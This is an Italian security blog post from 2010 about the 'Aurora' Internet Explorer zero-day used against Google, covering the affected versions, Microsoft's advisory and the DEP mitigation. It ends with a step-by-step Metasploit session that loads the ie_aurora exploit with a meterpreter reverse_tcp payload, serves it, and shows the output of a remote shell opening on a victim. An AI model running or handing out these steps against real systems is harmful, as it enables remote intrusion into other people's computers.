Google e l’aurora cinese
by admin on Jan.16, 2010, under Hacking, Sicurezza
È oramai acclarato che l’attacco subito da Google, e che ha fatto perdere la pazienza ai vertici della azienda di Mountain View, provocando un vero e proprio incidente diplomatico coi cinesi, sia stato attuato attraverso lo sfruttamento di una vulnerabilità “zero-day” a carico di alcune versioni di Internet Explorer.
La conferma è arrivata dalla stessa Microsoft, che si è si e subito preoccupata di pubblicare un relativo advisory e di suggerire agli utenti alcune impostazioni per mitigare i rischi derivanti da tale vulnerabilità, fino al rilascio di una nuova patch.
Le versioni incriminate sono la 6, 7 e 8, ma per quanto riguarda le ultime due, risultano vulnerabili solo se la funzionalità di Data Execution Prevention (DEP) è disabilitata (nella versione 8 essa è abilitata per default).
In Germania, il problema rappresentato dalla falla scoperta ha comunque indotto l’Autorità federale per la sicurezza nella tecnologia dell’informazione a sconsigliare l’utilizzo del browser di Microsoft.
Nel frattempo il codice dell’exploit, denominato “aurora” è divenuto pubblico, ed uno specifico modulo è già disponibile per Metasploit:
msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (your IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.10:8080/
[*] Server started.
msf exploit(ie_aurora) >
L’ exploit si concretizza puntando con una versione vulnerabile di Internet Explorer alla URL //Local IP:8080:
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.10:4444 -> 192.168.0.20:1514)
